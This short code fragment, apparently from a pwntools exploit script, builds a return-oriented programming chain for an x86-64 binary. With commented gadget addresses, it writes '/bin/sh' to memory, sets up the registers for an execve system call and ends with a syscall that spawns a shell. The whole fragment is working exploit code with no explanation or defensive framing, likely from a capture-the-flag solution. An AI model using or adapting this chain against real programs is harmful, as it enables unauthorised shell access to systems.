payload = p64(0x40538f)
#0x000000000040538f: pop r12; ret; 
payload += p64(0x423070)+p64(0x407e9f)
# 0x0000000000407e9f: pop rdi; pop rbp; ret; 
payload += p64(0x68662f6e69622f)+p64(0x0)+p64(0x409771)
# 0x0000000000409771: mov rax, rdi; ret; 
payload += p64(0x40af36)
# 0x000000000040af36: mov qword ptr [r12], rax; mov rax, rbp; pop rbx; pop rbp; pop r12; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4056ee)
# 0x00000000004056ee: cmp eax, 0xefffffff; mov edx, 0; cmove eax, edx; ret; 
payload += p64(0x404bac)
# 0x0000000000404bac: pop rsi; ret; 
payload += p64(0x0)+p64(0x407e9f)
# 0x0000000000407e9f: pop rdi; pop rbp; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x409772)
# 0x0000000000409772: mov eax, edi; ret; 
payload += p64(0x407e9f)
# 0x0000000000407e9f: pop rdi; pop rbp; ret; 
payload += p64(0x423070)+p64(0x0)+p64(0x406c16)
# 0x0000000000406c16: syscall; 
payload += b''
